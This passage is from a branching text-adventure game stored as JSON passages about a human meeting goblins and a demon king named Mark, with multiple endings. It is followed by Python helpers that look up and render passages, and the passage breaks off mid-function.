"text": "Goblin: Question 1! Which US president delivered the Gettysberg address?\nA: George Washington\nB: Abraham Lincoln\nC: Betty White (It's gonna happen)\nD: Barack Obama\nYou: How would you even know this?\nGoblin: Don't think about it!\n\n[[A->Death]]\n[[B->Question2]]\n[[C->Death]]\n[[D->Death]]",
"links": [
{
"linkText": "A",
"passageName": "Death",
"original": "[[A->Death]]"
},
{
"linkText": "B",
"passageName": "Question2",
"original": "[[B->Question2]]"
},
{
"linkText": "C",
"passageName": "Death",
"original": "[[C->Death]]"
},
{
"linkText": "D",
"passageName": "Death",
"original": "[[D->Death]]"
}
],
"hooks": [],
"cleanText": "Goblin: Question 1! Which US president delivered the Gettysberg address?\nA: George Washington\nB: Abraham Lincoln\nC: Betty White (It's gonna happen)\nD: Barack Obama\nYou: How would you even know this?\nGoblin: Don't think about it!"
},
{
"name": "Death",
"tags": "",
"id": "36",
"score": -1,
"text": "You died! Respawn?\n\n[[RESPAWN->Door1]]",
"links": [
{
"linkText": "RESPAWN",
"passageName": "Door1",
"original": "[[RESPAWN->Door1]]"
}
],
"hooks": [],
"cleanText": "You died! Respawn?"
},
{
"name": "Question2",
"tags": "",
"id": "37",
"score": 10,
"text": "Goblin: Question 2! How long does a day last on Uranus?\nA: 17 Hours\nB: 24 Hours (duh!)\nC: 3 times as long as a day on mercury\nD: A year\nYou: You guys know about Uranus??\n\n[[A->Question3]]\n[[B->Death]]\n[[C->Death]]\n[[D->Death]]",
"links": [
{
"linkText": "A",
"passageName": "Question3",
"original": "[[A->Question3]]"
},
{
"linkText": "B",
"passageName": "Death",
"original": "[[B->Death]]"
},
{
"linkText": "C",
"passageName": "Death",
"original": "[[C->Death]]"
},
{
"linkText": "D",
"passageName": "Death",
"original": "[[D->Death]]"
}
],
"hooks": [],
"cleanText": "Goblin: Question 2! How long does a day last on Uranus?\nA: 17 Hours\nB: 24 Hours (duh!)\nC: 3 times as long as a day on mercury\nD: A year\nYou: You guys know about Uranus??"
},
{
"name": "Question3",
"tags": "",
"id": "38",
"score": 10,
"text": "Goblin: Ok nerd, here's one you can't google!\nGoblin: Question 3! What's the demon king's real name?\nA: Matthew\nB: Jason\nC: Markus\nD: Alexander\nYou: How am I supposed to know that??\nGoblin: Hehe sounds like I'm about to become a manager.\n\n[[A->Death]]\n[[B->Death]]\n[[C->Goblin]]\n[[D->Death]]",
"links": [
{
"linkText": "A",
"passageName": "Death",
"original": "[[A->Death]]"
},
{
"linkText": "B",
"passageName": "Death",
"original": "[[B->Death]]"
},
{
"linkText": "C",
"passageName": "Goblin",
"original": "[[C->Goblin]]"
},
{
"linkText": "D",
"passageName": "Death",
"original": "[[D->Death]]"
}
],
"hooks": [],
"cleanText": "Goblin: Ok nerd, here's one you can't google!\nGoblin: Question 3! What's the demon king's real name?\nA: Matthew\nB: Jason\nC: Markus\nD: Alexander\nYou: How am I supposed to know that??\nGoblin: Hehe sounds like I'm about to become a manager."
},
{
"name": "Goblin",
"tags": "",
"id": "39",
"score": 10,
"text": "Goblin: You jerk! You just kept dying and guessing!\nYou: No I didn't I just know someone else with that name!\nGoblin: Ahhhh you are clearly superior you will be my boss one day my 5th grade teacher was riiiiiigggghhhtttttt. . ..\nThe goblin stumbles around in faux agony and then hides behind a bush.\nGoblin: Wait! I'll just take you to the demon king and get the reward from the head honcho! I'll be famous!\nYou: No don't!\nYou think back to your earlier conversation. If he's that weak you can take him. Wanna try?\n\n[[FIGHT->GoblinEvil]]\n[[TAlK->GoblinGood]]",
"links": [
{
"linkText": "FIGHT",
"passageName": "GoblinEvil",
"original": "[[FIGHT->GoblinEvil]]"
},
{
"linkText": "TALK",
"passageName": "GoblinGood",
"original": "[[TALK->GoblinGood]]"
}
],
"hooks": [],
"cleanText": "Goblin: You jerk! You just kept dying and guessing!\nYou: No I didn't I just know someone else with that name!\nGoblin: Ahhhh you are clearly superior you will be my boss one day my 5th grade teacher was riiiiiigggghhhtttttt. . ..\nThe goblin stumbles around in faux agony and then hides behind a bush.\nGoblin: Wait! I'll just take you to the demon king and get the reward from the head honcho! I'll be famous!\nYou: No don't!\nYou think back to your earlier conversation. If he's that weak you can take him. Wanna try?"
},
{
"name": "GoblinEvil",
"tags": "",
"id": "40",
"score": -10,
"text": "You attack the goblin and easily beat him into submission. He fades away into smoke. He's gone. You look around and so is everyone else. What was once a bustling town was now a ghost town. You can't focus on that now though. What's done is done. Time to go home.\nWilbur: Hey Slippy where'd everyone go?\nYou: Uh I don't know! Don't ask me!\nWilbur: Geez dude calm down. Here, the castle gates are open. Let's go inside.\n\n[[NEXT->FortressEntranceEvil]]",
"links": [
{
"linkText": "NEXT",
"passageName": "FortressEntranceEvil",
"original": "[[NEXT->FortressEntranceEvil]]"
}
],
"hooks": [],
"cleanText": "You attack the goblin and easily beat him into submission. He fades away into smoke. He's gone. You look around and so is everyone else. What was once a bustling town was now a ghost town. You can't focus on that now though. What's done is done. Time to go home.\nWilbur: Hey Slippy where'd everyone go?\nYou: Uh I don't know! Don't ask me!\nWilbur: Geez dude calm down. Here, the castle gates are open. Let's go inside."
},
{
"name": "GoblinGood",
"tags": "",
"id": "41",
"score": 10,
"text": "You: Please don't sir! I just want to go home and see my family!\nGoblin: Y-You're right I'm sorry. I can't let my greed end another's life. Please accept my apology and go ahead.\nHe motions you ahead and a familiar face runs through the crowd with more bananas than you can count stored in incredibly creative ways.\nWilbur: Heya Slippy! Sorry, the banana store was having a sale!\nYou sigh a little bit but motion Wilbur to go first since he's your terrible guide and you need to find the thrown room.\nWilbur: Let's go!\nGoblin: Good luck kid!\nYou and the goblin exchange a much more genuine smile than before and then you enter the castle to finally face this demon king.\n\n[[NEXT->FortessEntranceGood]]",
"links": [
{
"linkText": "NEXT",
"passageName": "FortessEntranceGood",
"original": "[[NEXT->FortessEntranceGood]]"
}
],
"hooks": [],
"cleanText": "You: Please don't sir! I just want to go home and see my family!\nGoblin: Y-You're right I'm sorry. I can't let my greed end another's life. Please accept my apology and go ahead.\nHe motions you ahead and a familiar face runs through the crowd with more bananas than you can count stored in incredibly creative ways.\nWilbur: Heya Slippy! Sorry, the banana store was having a sale!\nYou sigh a little bit but motion Wilbur to go first since he's your terrible guide and you need to find the thrown room.\nWilbur: Let's go!\nGoblin: Good luck kid!\nYou and the goblin exchange a much more genuine smile than before and then you enter the castle to finally face this demon king."
},
{
"name": "FortressEntranceEvil",
"tags": "",
"id": "42",
"text": "You follow Wilbur into the halls of the demon king. It's empty. This is your moment. When the times strikes you'll end him and finally go home.\nWilbur: I know what you did.\nYou: Did what?\nWilbur: You're digusting. I finally understand why the demon king hates humans. They really are vile and disgusting creatures.\nYou: I had to!\nWilbur: No one has to do anything. Especially kill.\nOn that note, it's time to face you destiny.\n\n[[NEXT->ThroneRoomEvil]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoomEvil",
"original": "[[NEXT->ThroneRoomEvil]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur into the halls of the demon king. It's empty. This is your moment. When the times strikes you'll end him and finally go home.\nWilbur: I know what you did.\nYou: Did what?\nWilbur: You're digusting. I finally understand why the demon king hates humans. They really are vile and disgusting creatures.\nYou: I had to!\nWilbur: No one has to do anything. Especially kill.\nOn that note, it's time to face you destiny."
},
{
"name": "FortessEntranceGood",
"tags": "",
"id": "43",
"text": "You follow Wilbur into the mighty halls of the demon king. Oddly enough, there are no portraits of the demon king nor are there any statues or any depictions of the demon king. Wilbur walks slowly through the halls to give you time to admire their magnitude. This is the first time he's been a good guide. There are a lot of guards around the place. They are tall mighty human shaped figures with the heads of eagles. Easily 7 feet tall and just as magnificent as the halls they roam.\nWilbur: The throne room is just up ahead. Anything you wanna know about the demon king before you meet him?\n\n[[YES->QuestionDemonKing]]\n[[NO->ThroneRoom]]",
"links": [
{
"linkText": "YES",
"passageName": "QuestionDemonKing",
"original": "[[YES->QuestionDemonKing]]"
},
{
"linkText": "NO",
"passageName": "ThroneRoom",
"original": "[[NO->ThroneRoom]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur into the mighty halls of the demon king. Oddly enough, there are no portraits of the demon king nor are there any statues or any depictions of the demon king. Wilbur walks slowly through the halls to give you time to admire their magnitude. This is the first time he's been a good guide. There are a lot of guards around the place. They are tall mighty human shaped figures with the heads of eagles. Easily 7 feet tall and just as magnificent as the halls they roam.\nWilbur: The throne room is just up ahead. Anything you wanna know about the demon king before you meet him?"
},
{
"name": "Town",
"tags": "",
"id": "44",
"text": "You look and see an abandoned banana store, Wilbur standing by the castle gates, and what looks to be footprints. What will you do?\n\n[[BANANA->BananaEvil]]\n[[WILBUR->DoorEvil]]\n[[FOOTPRINTS->FootPrints]]",
"links": [
{
"linkText": "BANANA",
"passageName": "BananaEvil",
"original": "[[BANANA->BananaEvil]]"
},
{
"linkText": "WILBUR",
"passageName": "DoorEvil",
"original": "[[WILBUR->DoorEvil]]"
},
{
"linkText": "FOOTPRINTS",
"passageName": "FootPrints",
"original": "[[FOOTPRINTS->FootPrints]]"
}
],
"hooks": [],
"cleanText": "You look and see an abandoned banana store, Wilbur standing by the castle gates, and what looks to be footprints. What will you do?"
},
{
"name": "BananaEvil",
"tags": "",
"id": "45",
"text": "You drift over to the banana store. Theres banans and random junk all over the place. It's almost like everyone up and vanished.\n\n[[BACK->Town]]",
"links": [
{
"linkText": "BACK",
"passageName": "Town",
"original": "[[BACK->Town]]"
}
],
"hooks": [],
"cleanText": "You drift over to the banana store. Theres banans and random junk all over the place. It's almost like everyone up and vanished."
},
{
"name": "DoorEvil",
"tags": "",
"id": "46",
"text": "You walk over to Wilbur by the giant pair of doors that lead to the castle of the great demon king.\nWilbur: I bet you're wondering where everyone went huh?\nYou: Kinda yea, I figured it was abandoned.\nWilbur: Now it is.\nWilbur opens the door and walks inside. I guess follow him?\n\n[[NEXT->FortessEntranceOrville]]",
"links": [
{
"linkText": "NEXT",
"passageName": "FortessEntranceOrville",
"original": "[[NEXT->FortessEntranceOrville]]"
}
],
"hooks": [],
"cleanText": "You walk over to Wilbur by the giant pair of doors that lead to the castle of the great demon king.\nWilbur: I bet you're wondering where everyone went huh?\nYou: Kinda yea, I figured it was abandoned.\nWilbur: Now it is.\nWilbur opens the door and walks inside. I guess follow him?"
},
{
"name": "FootPrints",
"tags": "",
"id": "47",
"text": "You walk over to the footprints and examine them. They look like human footprints but almost as if they were missing flesh. So a skeleton I guess? They could've made great friends I bet.\n\n[[BACK->Town]]",
"links": [
{
"linkText": "BACK",
"passageName": "Town",
"original": "[[BACK->Town]]"
}
],
"hooks": [],
"cleanText": "You walk over to the footprints and examine them. They look like human footprints but almost as if they were missing flesh. So a skeleton I guess? They could've made great friends I bet."
},
{
"name": "FortessEntranceOrville",
"tags": "",
"id": "48",
"text": "You follow Wilbur into the halls of the demon king. It's empty. As you follow Wilbur to the throne room you feel the full force of guilt.\nWilbur: The demon king really was right. Humans are vile creatures.\nYou: I'm sorry.\nWilbur: Sorry doesn't bring him back.\nYou: I don't know what came out of me.\nWilbur: You weren't possessed by anything. There is no nasty entity controlling you. You are that entity.\nOn that note, you should just shut up. It's time to end the demon king.\n\n[[NEXT->ThroneRoomOrville]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoomOrville",
"original": "[[NEXT->ThroneRoomOrville]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur into the halls of the demon king. It's empty. As you follow Wilbur to the throne room you feel the full force of guilt.\nWilbur: The demon king really was right. Humans are vile creatures.\nYou: I'm sorry.\nWilbur: Sorry doesn't bring him back.\nYou: I don't know what came out of me.\nWilbur: You weren't possessed by anything. There is no nasty entity controlling you. You are that entity.\nOn that note, you should just shut up. It's time to end the demon king."
},
{
"name": "QuestionDemonKing",
"tags": "",
"id": "49",
"text": "Here are the questions you can ask Wilbur.\nA: What is the demon king like?\nB: Why is he called the demon king?\nC: Why does he hate humans?\nD: Is his real name Markus?\n\n[[A->AnswerA]]\n[[B->AnswerB]]\n[[C->AnswerC]]\n[[D->AnswerD]]\n[[BACK->FortessEntranceGood]]",
"links": [
{
"linkText": "A",
"passageName": "AnswerA",
"original": "[[A->AnswerA]]"
},
{
"linkText": "B",
"passageName": "AnswerB",
"original": "[[B->AnswerB]]"
},
{
"linkText": "C",
"passageName": "AnswerC",
"original": "[[C->AnswerC]]"
},
{
"linkText": "D",
"passageName": "AnswerD",
"original": "[[D->AnswerD]]"
},
{
"linkText": "BACK",
"passageName": "FortessEntranceGood",
"original": "[[BACK->FortessEntranceGood]]"
}
],
"hooks": [],
"cleanText": "Here are the questions you can ask Wilbur.\nA: What is the demon king like?\nB: Why is he called the demon king?\nC: Why does he hate humans?\nD: Is his real name Markus?"
},
{
"name": "ThroneRoom",
"tags": "",
"id": "50",
"text": "You open the door to a peaceful serene garden. In the middle a tall figure in golden robes slowly turns your way.\nDemon King: Hello human.\nHe examines you. His eyes cold as steel. He knows he is better than you and he gets extremely close by bending forward. His dark hair covers his silver eyes before he backs away and resumes his royal stance.\nDemon King: What do you want child?\nYou turn to Wilbur for help frozen in fear but he's gone. It's just you and the demon king.\nDemon King: All humans in my chambers want only one thing. To leave. Am I correct?\nYou: Yes sir. I fell down here with my friend and I heard this is my only way out.\nDemon King: Some friend you are. Why did you leave your friend behind?\nWill you tell the truth or lie?\n\n[[TRUTH->ThroneRoomTruth]]\n[[LIE->ThroneRoomLie]]",
"links": [
{
"linkText": "TRUTH",
"passageName": "ThroneRoomTruth",
"original": "[[TRUTH->ThroneRoomTruth]]"
},
{
"linkText": "LIE",
"passageName": "ThroneRoomLie",
"original": "[[LIE->ThroneRoomLie]]"
}
],
"hooks": [],
"cleanText": "You open the door to a peaceful serene garden. In the middle a tall figure in golden robes slowly turns your way.\nDemon King: Hello human.\nHe examines you. His eyes cold as steel. He knows he is better than you and he gets extremely close by bending forward. His dark hair covers his silver eyes before he backs away and resumes his royal stance.\nDemon King: What do you want child?\nYou turn to Wilbur for help frozen in fear but he's gone. It's just you and the demon king.\nDemon King: All humans in my chambers want only one thing. To leave. Am I correct?\nYou: Yes sir. I fell down here with my friend and I heard this is my only way out.\nDemon King: Some friend you are. Why did you leave your friend behind?\nWill you tell the truth or lie?"
},
{
"name": "AnswerA",
"tags": "",
"id": "51",
"text": "Wilbur: He's a human. He's very kind and always helps people and doesn't see himself as a king. Rumor has it that he's the first human to enter the monster world. He always gives his possessions away and makes sure all monster kind is taken care of and fed. He just doesn't like humans.\n\n[[BACK->QuestionDemonKing]]",
"links": [
{
"linkText": "BACK",
"passageName": "QuestionDemonKing",
"original": "[[BACK->QuestionDemonKing]]"
}
],
"hooks": [],
"cleanText": "Wilbur: He's a human. He's very kind and always helps people and doesn't see himself as a king. Rumor has it that he's the first human to enter the monster world. He always gives his possessions away and makes sure all monster kind is taken care of and fed. He just doesn't like humans."
},
{
"name": "AnswerB",
"tags": "",
"id": "52",
"text": "Wilbur: I'm not quite sure. Maybe he thought it would fit in with the aesthetic of being a monster. He's a huge softy so I tend not to see him as a huge big bad intimidating demon.\n\n[[BACK->QuestionDemonKing]]",
"links": [
{
"linkText": "BACK",
"passageName": "QuestionDemonKing",
"original": "[[BACK->QuestionDemonKing]]"
}
],
"hooks": [],
"cleanText": "Wilbur: I'm not quite sure. Maybe he thought it would fit in with the aesthetic of being a monster. He's a huge softy so I tend not to see him as a huge big bad intimidating demon."
},
{
"name": "AnswerC",
"tags": "",
"id": "53",
"text": "Wilbur: He says it's because they are untrustworthy and vile. He says he lost faith in humans when he came here and that the monsters here are so kind when they took him in that he vowed to extreminate every human that dare enter monster territory.\n\n[[BACK->QuestionDemonKing]]",
"links": [
{
"linkText": "BACK",
"passageName": "QuestionDemonKing",
"original": "[[BACK->QuestionDemonKing]]"
}
],
"hooks": [],
"cleanText": "Wilbur: He says it's because they are untrustworthy and vile. He says he lost faith in humans when he came here and that the monsters here are so kind when they took him in that he vowed to extreminate every human that dare enter monster territory."
},
{
"name": "AnswerD",
"tags": "",
"id": "54",
"text": "Wilbur: Yea how did you know that?\n\n[[BACK->QuestionDemonKing]]",
"links": [
{
"linkText": "BACK",
"passageName": "QuestionDemonKing",
"original": "[[BACK->QuestionDemonKing]]"
}
],
"hooks": [],
"cleanText": "Wilbur: Yea how did you know that?"
},
{
"name": "ThroneRoomEvil",
"tags": "",
"id": "55",
"text": "You walk into the throne room and see the demon king. He is tall and has dark hair. He slowly turns to you but you immediately take the chance to attack him. He easily dodges and kicks you against the wall.\nDemon King: Foolish boy. Such an action is a sign that the human world has not changed. You are so corrupted by violence that you try to attack me? You truly are disgusting.\nThe demon king leans in close. His silver eyes pierce your soul. \nDemon King: You have changed old friend. The world of monsters has judged you and found you guilty. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. In this timeline you have chosen violence.\nYou finally realize who the demon king really is.\nDemon King: I can tell by your reaction you know exactly who I am. I am not your mark however. I am a Mark from a timeline where my actions were tried and true, as such I was judged and rewarded with my position.\n\n[[NEXT->ThroneRoomEvil1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoomEvil1",
"original": "[[NEXT->ThroneRoomEvil1]]"
}
],
"hooks": [],
"cleanText": "You walk into the throne room and see the demon king. He is tall and has dark hair. He slowly turns to you but you immediately take the chance to attack him. He easily dodges and kicks you against the wall.\nDemon King: Foolish boy. Such an action is a sign that the human world has not changed. You are so corrupted by violence that you try to attack me? You truly are disgusting.\nThe demon king leans in close. His silver eyes pierce your soul. \nDemon King: You have changed old friend. The world of monsters has judged you and found you guilty. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. In this timeline you have chosen violence.\nYou finally realize who the demon king really is.\nDemon King: I can tell by your reaction you know exactly who I am. I am not your mark however. I am a Mark from a timeline where my actions were tried and true, as such I was judged and rewarded with my position."
},
{
"name": "ThroneRoomOrville",
"tags": "",
"id": "56",
"text": "You walk into the throne room and see the demon king. He is tall and has dark hair. He slowly turns to you but you immediately take the chance to attack him. He easily dodges and kicks you against the wall.\nDemon King: Foolish boy. Such an action is a sign that the human world has not changed. You are so corrupted by violence that you try to attack me? You truly are disgusting.\nThe demon king leans in close. His silver eyes pierce your soul. \nDemon King: You have changed old friend. The world of monsters has judged you and found you guilty. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. In this timeline you have chosen violence.\nYou finally realize who the demon king really is.\nDemon King: I can tell by your reaction you know exactly who I am. I am not your mark however. I am a Mark from a timeline where my actions were tried and true, as such I was judged and rewarded with my position.\n\n[[NEXT->ThroneRoomOrville1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoomOrville1",
"original": "[[NEXT->ThroneRoomOrville1]]"
}
],
"hooks": [],
"cleanText": "You walk into the throne room and see the demon king. He is tall and has dark hair. He slowly turns to you but you immediately take the chance to attack him. He easily dodges and kicks you against the wall.\nDemon King: Foolish boy. Such an action is a sign that the human world has not changed. You are so corrupted by violence that you try to attack me? You truly are disgusting.\nThe demon king leans in close. His silver eyes pierce your soul. \nDemon King: You have changed old friend. The world of monsters has judged you and found you guilty. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. In this timeline you have chosen violence.\nYou finally realize who the demon king really is.\nDemon King: I can tell by your reaction you know exactly who I am. I am not your mark however. I am a Mark from a timeline where my actions were tried and true, as such I was judged and rewarded with my position."
},
{
"name": "ThroneRoomTruth",
"tags": "",
"id": "57",
"score": 5,
"text": "You: I left him behind because I was selfish and abandoned him.\nThe demon king smirks.\nDemon King: I know. You are no different than all humans. Although I appreciate you honesty, you must pay for your kind's sins.\nYou: But I didn't do anything evil! It's not my fault humans treated you badly!\nThe demon king slowly walks around his garden smelling the flowers and examining the vegetables he grew. You look up and notice the sun shines down directly onto his garden.\nDemon King: You claim innocence yet do nothing to stop evil actions? You abandon your friend and lecture me on morals? You watch and commit abuses yourself and live among monsters and still don't recognize who the real monster is?\n\n[[NEXT->ThroneRoom1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoom1",
"original": "[[NEXT->ThroneRoom1]]"
}
],
"hooks": [],
"cleanText": "You: I left him behind because I was selfish and abandoned him.\nThe demon king smirks.\nDemon King: I know. You are no different than all humans. Although I appreciate you honesty, you must pay for your kind's sins.\nYou: But I didn't do anything evil! It's not my fault humans treated you badly!\nThe demon king slowly walks around his garden smelling the flowers and examining the vegetables he grew. You look up and notice the sun shines down directly onto his garden.\nDemon King: You claim innocence yet do nothing to stop evil actions? You abandon your friend and lecture me on morals? You watch and commit abuses yourself and live among monsters and still don't recognize who the real monster is?"
},
{
"name": "ThroneRoomLie",
"tags": "",
"id": "58",
"score": -5,
"text": "You: I-I tried looking for him but I assumed the worst had happened so I continued on.\nThe demon king gets in your face extremely quickly. With his robes still in the air from his dash, he leans into your ear.\nDemon King: Don't lie to me boy. I own this domain and see all that happens within it.\nYou clench your fists and start to tear up but quickly wipe them away as he backs off.\nDemon King: All humans are so vile and disgusting. You live among monsters and do not yet see that you are the true monster.\n\n[[NEXT->ThroneRoom1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoom1",
"original": "[[NEXT->ThroneRoom1]]"
}
],
"hooks": [],
"cleanText": "You: I-I tried looking for him but I assumed the worst had happened so I continued on.\nThe demon king gets in your face extremely quickly. With his robes still in the air from his dash, he leans into your ear.\nDemon King: Don't lie to me boy. I own this domain and see all that happens within it.\nYou clench your fists and start to tear up but quickly wipe them away as he backs off.\nDemon King: All humans are so vile and disgusting. You live among monsters and do not yet see that you are the true monster."
},
{
"name": "ThroneRoom1",
"tags": "",
"id": "59",
"text": "You take a deep breath and look at him and it finally clicks in your head.\nYou: Mark?\nThe demon king laughs.\nDemon King: Yes, but not your Mark. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. Though I have not been called that for ages, I am a version of Mark that has walked a tried and true path. The realm of monsters has judged you and seen your path. As such, you will be permitted to leave. I will give you the option to stay as the monsters have taken a liking to you.\nYou turn around and see Wilbur and his brother Orville and the goblin standing in the entrance. The demon king smiles. What will it be friend?\n\n[[STAY->GoodEndingStay]]\n[[LEAVE->GoodEndingLeave]]\n[[DELETETHISONE->SecretEnding]]",
"links": [
{
"linkText": "STAY",
"passageName": "GoodEndingStay",
"original": "[[STAY->GoodEndingStay]]"
},
{
"linkText": "LEAVE",
"passageName": "GoodEndingLeave",
"original": "[[LEAVE->GoodEndingLeave]]"
},
{
"linkText": "SECRET",
"passageName": "SecretEnding",
"original": "[[DELETETHISONE->SecretEnding]]"
}
],
"hooks": [],
"cleanText": "You take a deep breath and look at him and it finally clicks in your head.\nYou: Mark?\nThe demon king laughs.\nDemon King: Yes, but not your Mark. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. Though I have not been called that for ages, I am a version of Mark that has walked a tried and true path. The realm of monsters has judged you and seen your path. As such, you will be permitted to leave. I will give you the option to stay as the monsters have taken a liking to you.\nYou turn around and see Wilbur and his brother Orville and the goblin standing in the entrance. The demon king smiles. What will it be friend?"
},
{
"name": "GoodEndingStay",
"tags": "",
"id": "60",
"score": 20,
"text": "You: I want to stay. These monsters are my family they did everything they could to bring me here and sacrificed a lot. Since everything is doomed to repeat, there will be another version of me right? He can leave. Me? I want to stay.\nMark: A wise choice friend.\nMark smiles. Wilburs motions you forward and you all leave the throne room going back to the entrance. What started as a cave exploration was an exploration of what it means to be a true friend.\n\nGOOD ENDING: Type SECRET at an important choice for the true ending!",
"links": [],
"hooks": [],
"cleanText": "You: I want to stay. These monsters are my family they did everything they could to bring me here and sacrificed a lot. Since everything is doomed to repeat, there will be another version of me right? He can leave. Me? I want to stay.\nMark: A wise choice friend.\nMark smiles. Wilburs motions you forward and you all leave the throne room going back to the entrance. What started as a cave exploration was an exploration of what it means to be a true friend.\n\nGOOD ENDING: Type SECRET at an important choice for the true ending!"
},
{
"name": "GoodEndingLeave",
"tags": "",
"id": "61",
"score": 20,
"text": "You: I want to leave. Wilbur and everyone else will be invaluable friends but since everything is doomed to repeat, for the sake of my other copies, I should go home. Another version of me will stay. Me? I should go.\nMark: A wise choice friend.\nMark smiles and opens the door. The sun shines through. For the first time in awhile, you can smell the fresh air. It's time to go home.\nAll of your friends smile and wave as you walk away.\nWilbur: Do you think he'll ever come back?\nMark: He always does.\n\nGOOD ENDING: Type SECRET at an important choice for the true ending!",
"links": [],
"hooks": [],
"cleanText": "You: I want to leave. Wilbur and everyone else will be invaluable friends but since everything is doomed to repeat, for the sake of my other copies, I should go home. Another version of me will stay. Me? I should go.\nMark: A wise choice friend.\nMark smiles and opens the door. The sun shines through. For the first time in awhile, you can smell the fresh air. It's time to go home.\nAll of your friends smile and wave as you walk away.\nWilbur: Do you think he'll ever come back?\nMark: He always does.\n\nGOOD ENDING: Type SECRET at an important choice for the true ending!"
},
{
"name": "SecretEnding",
"tags": "",
"id": "62",
"score": 50,
"text": "You: Why can't you guys come too?\nMark looks surprised.\nWilbur: Monsters in the human world?\nMark is in deep thought.\nWilbur: This human was pretty cool. I trust him.\nMark: Maybe your coming was a sign that the curse is broken. Shall we test the morals of humans once again?\nMark walks forward and hand in hand, you all open and walk through the door to the outside.\n\nTRUE ENDING",
"links": [],
"hooks": [],
"cleanText": "You: Why can't you guys come too?\nMark looks surprised.\nWilbur: Monsters in the human world?\nMark is in deep thought.\nWilbur: This human was pretty cool. I trust him.\nMark: Maybe your coming was a sign that the curse is broken. Shall we test the morals of humans once again?\nMark walks forward and hand in hand, you all open and walk through the door to the outside.\n\nTRUE ENDING"
},
{
"name": "ThroneRoomEvil1",
"tags": "",
"id": "63",
"text": "You: What's gonna happen to me?\nMark: You will be punished. For killing innocent monsters you will be the front guard of the cave. All who the cave beckons, you must push so they may be judged. This is your duty. Even if it is yourself.\nYou: What if I don't.\nMark laughs.\nMark: You don't make the choice. The cave controls you now, you must simply observe as it uses you.\nYou start to feel dizzy and slowly black out.\nMark: Goodbye, old friend.\n\n[[NEXT->BadEnding]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BadEnding",
"original": "[[NEXT->BadEnding]]"
}
],
"hooks": [],
"cleanText": "You: What's gonna happen to me?\nMark: You will be punished. For killing innocent monsters you will be the front guard of the cave. All who the cave beckons, you must push so they may be judged. This is your duty. Even if it is yourself.\nYou: What if I don't.\nMark laughs.\nMark: You don't make the choice. The cave controls you now, you must simply observe as it uses you.\nYou start to feel dizzy and slowly black out.\nMark: Goodbye, old friend."
},
{
"name": "BadEnding",
"tags": "",
"id": "64",
"score": -20,
"text": "You wake up in a cave and see 2 children over by the ledge. One of the children is gazing deep into the cave and distracted.\nChild 1: Did you see that??\nYou: Want a closer look?\nThe child screams on his way down the cave. The other child turns around and it's you. The cave is in control now.\nYou: H-hey! What are you doing here?\nIt's too late you push the other child down.\n\nBAD ENDING",
"links": [],
"hooks": [],
"cleanText": "You wake up in a cave and see 2 children over by the ledge. One of the children is gazing deep into the cave and distracted.\nChild 1: Did you see that??\nYou: Want a closer look?\nThe child screams on his way down the cave. The other child turns around and it's you. The cave is in control now.\nYou: H-hey! What are you doing here?\nIt's too late you push the other child down.\n\nBAD ENDING"
},
{
"name": "ThroneRoomOrville1",
"tags": "",
"id": "65",
"text": "You: What's gonna happen to me?\nMark: You will be punished. For killing Orville you must atone by living out Wilbur's life and forever will you watch you brother be killed, other times you won't but everytime you die you will play the cruel game of lottery again. Such is fate. But your promise is to always bring the human to me no matter what.\nYou start to feel dizzy and slowly black out.\nMark: Goodbye, old friend.\n\n[[NEXT->BadEnding2]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BadEnding2",
"original": "[[NEXT->BadEnding2]]"
}
],
"hooks": [],
"cleanText": "You: What's gonna happen to me?\nMark: You will be punished. For killing Orville you must atone by living out Wilbur's life and forever will you watch you brother be killed, other times you won't but everytime you die you will play the cruel game of lottery again. Such is fate. But your promise is to always bring the human to me no matter what.\nYou start to feel dizzy and slowly black out.\nMark: Goodbye, old friend."
},
{
"name": "BadEnding2",
"tags": "",
"id": "66",
"score": -20,
"text": "You're on an evening stroll and suddenly a child falls in front of you.\\\nYou: Hey bud are you ok?\n\nBAD ENDING",
"links": [],
"hooks": [],
"cleanText": "You're on an evening stroll and suddenly a child falls in front of you.\\\nYou: Hey bud are you ok?\n\nBAD ENDING"
}
]
}
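# ----------------------------------------------------------------
# Optional consistency check (an addition, not part of the original
# game): verify that every link's "passageName" points at a passage
# that actually exists; a dangling target would strand the player in
# an empty location.
def find_dangling_links(world_data):
    names = {p["name"] for p in world_data.get("passages", [])}
    dangling = []
    for passage in world_data.get("passages", []):
        for link in passage.get("links", []):
            if link["passageName"] not in names:
                dangling.append((passage["name"], link["passageName"]))
    return dangling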
# ----------------------------------------------------------------
def find_current_location(location_label):
    """Return the passage dict whose "name" matches location_label, or {}."""
    if "passages" in world:
        for passage in world["passages"]:
            if location_label == passage["name"]:
                return passage
    return {}
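
# A possible optimization (a sketch, not part of the original game): with
# this many passages, a dict index keyed on passage name gives O(1) lookup
# instead of the linear scan above.
def build_passage_index(world_data):
    # Map each passage's "name" to its passage dict.
    return {p["name"]: p for p in world_data.get("passages", [])}
# Usage: passage_index = build_passage_index(world)
#        current_location = passage_index.get(location_label, {})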
# ----------------------------------------------------------------
def render(current_location, score, moves):
    """Print move/score status, the passage text, and the visible choices."""
    if "name" in current_location and "cleanText" in current_location:
        print("Moves: {}, Score: {}".format(moves, score))
        print(current_location["cleanText"] + "\n")
        for link in current_location["links"]:
            # Hide the secret choice; the good endings hint that it exists.
